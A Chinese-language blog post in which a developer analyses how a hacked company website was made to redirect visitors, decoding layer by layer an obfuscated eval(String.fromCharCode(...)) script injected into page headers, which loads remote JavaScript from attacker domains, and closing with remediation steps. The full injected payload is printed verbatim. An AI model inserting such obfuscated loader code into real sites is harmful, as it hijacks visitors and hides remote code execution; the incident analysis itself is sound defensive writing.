记录 - 网站被 HACK！

上周公司的一个网站被 hack 了，这里分享下攻击者在服务器上所做的趣事。

网站是 hosting 在一个比较老的服务器上面，一直也没出过什么问题，被 hack 后，它会跳转到另外一个网页。

原因很简单：HMTL  head 里面被加载了跳转到其它页面的 JS 代码！

JS 是怎么被加载的

一开始以为是 XSS 攻击，在检查了数据库和代码后排除了这个可能性，然后想到是不是服务器的用户密码泄露了，后来证实确实是的，还好该用户在服务器上只有一些基本权限，没有造成比较严重的后果。

攻击者在服务器上面执行了一个简单的 PHP Script，还删除了记录用户运行命令的 bash history，不过我还是在 bash history 中看到了一些命令，比如：rm vqia9vfg.php。

脚本 vqia9vfg.php 所执行的是在 storage/framework/views 下 PHP 文件里查找所有的 HTML head 元素，并且插入以下代码：

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>

有趣的事情来了，这段代码到底干了什么？

JS 是如何运作的

首先需要简单了解下 JS 的 String.fromCharCode 和 eval function。
因此以上的数字是 UTF-16 字符串，你可以去这个网站解析下代码：http://jdstiles.com/java/cct.html ，得到的第一次结果如下：

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 50);

var alls = document.getElementsByTagName('script');
var nt3 = true;
for ( var i = alls.length; i--;) {
  if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) {
    nt3 = false;
  }
}
if(nt3 == true) {
  document.getElementsByTagName("head")[0].appendChild(somestring);
}

可以看到里面还包含两段字符串，继续解析：

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = 'https://examhome.net/stat.js?v=1.0.2';
var alls = document.getElementsByTagName('script');

var nt3 = true;
for (var i = alls.length; i--;) {
  if (alls[i].src.indexOf('examhome') > -1) {
    nt3 = false;
  }
}
if (nt3 == true) {
  document.getElementsByTagName("head")[0].appendChild(somestring);
}

以上代码会加载 https://examhome.net/stat.js?v=1.0.2 到页面中（该链接已经无法打开），那这段 JS 又是什么？它其实会加载一段新的字符串：

118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59

解析后得到如下代码：

var simplelement = document.createElement('script');
simplelement.type = 'text/javascript';
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115);
simplelement.async = true;
document.getElementsByTagName("head")[0].appendChild(simplelement);

里面还有字符串，继续解析：

var simplelement = document.createElement('script');
simplelement.type = 'text/javascript';
simplelement.src = 'https://mp3menu.org/mp3.js';
simplelement.async = true;
document.getElementsByTagName("head")[0].appendChild(simplelement);

此时又加载了一个新的的 JS 链接 https://mp3menu.org/mp3.js ，可以点开，它包含了以下代码：

eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));

我也是醉了，只能继续解析：

(function () {
  if (document.cookie.indexOf("mp3menu=") >= 0) {
  } else {
    expiry = new Date();
    expiry.setTime(expiry.getTime() + (10 * 60 * 1000 * 6 * 8));
    document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();
    var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112);
    window.location.replace(mp3menu);
    window.location.href = mp3menu;
  }
})();

感觉终于看见曙光了，最后一次解析，得到最终如下代码：

(function () {
  if (document.cookie.indexOf("mp3menu=") >= 0) {
  } else {
    expiry = new Date();
    expiry.setTime(expiry.getTime() + (10 * 60 * 1000 * 6 * 8));
    document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();
    var mp3menu = 'https://mp3menu.org/red.php';
    window.location.replace(mp3menu);
    window.location.href = mp3menu;
  }
})();

非常明显了，网页会被跳转到 https://mp3menu.org/red.php ，被 Hack 的网站的首页就自动跳转到了该页面。

其它的发现

页面其实还会加载另外一个 PHP 平台链接，它是用了 Open Analytics Platform Matomo 去记录被 hack 的网站的名称，URL等。

小结

开发不易，安全太重要！！！

当时立即采取的措施是：

• 更新密码，重新检查该用户的权限。
• 除了公司 IP 之外，block 掉了所有 IP 地址的 SSH 登录。
• 如果想在其它地方登录：因为公司有个 diskstation 服务器，所以配置了 ssh tunnel through diskstation - 通过 diskstation 再进入服务器。当然进入 diskstation 必须使用 authorized keys，所以安全性得到了很大的提高。

本作品采用《CC 协议》，转载必须注明作者和本文链接